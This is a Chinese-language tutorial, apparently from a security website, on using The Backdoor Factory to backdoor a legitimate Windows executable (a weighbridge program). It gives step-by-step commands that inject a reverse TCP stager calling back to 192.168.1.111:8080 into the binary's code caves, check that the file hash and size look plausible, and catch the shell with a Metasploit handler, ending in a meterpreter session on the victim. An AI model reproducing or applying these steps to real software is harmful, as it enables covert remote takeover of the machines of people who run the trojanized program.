The-Backdoor-Factory介绍

华盟原创文章投稿奖励计划

项目地址:https://github.com/secretsquirrel/the-backdoor-factory

原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload。

以项目中的过磅系统为例:

以项目中的过磅系统为例:

root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git//安装the-backdoor-factory

The-Backdoor-Factory介绍

root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f~/demo/guobang.exe -S

//检测是否支持后门植入

The-Backdoor-Factory介绍

root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f~/demo/guobang.exe -c -l 150

//测试裂缝空间size150

The-Backdoor-Factory介绍

root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f

~/demo/guobang.exe -s show

//查看可用payload

The-Backdoor-Factory介绍

root@John:~/Desktop/the-backdoor-factory#./backdoor.pyf~/demo/guobang.exe-H192.168.1.111-P8080-siat_reverse_tcp_stager_threaded

//插入payload,并生成文件。

The-Backdoor-Factory介绍

root@John:~/Desktop/the-backdoor-factory#md5sum ./guobang.exe/root/demo/guobang.exe

//对比原文件与生成文件MD5值

The-Backdoor-Factory介绍

root@John:~/Desktop/the-backdoor-factory#du-k ./guobang.exe/root/demo/guobang.exe

//对比文件大小

The-Backdoor-Factory介绍

msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.1.111

lhost => 192.168.1.111msf exploit(handler) > set lport 8080lport => 8080msf exploit(handler) > exploit -j

//开启本地监听

The-Backdoor-Factory介绍

//打开软件

The-Backdoor-Factory介绍

meterpreter > getuidServer username: John-PCJohn

//确定目标

The-Backdoor-Factory介绍

文章来源:https://micropoor.blogspot.com/

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/231216.html

发表评论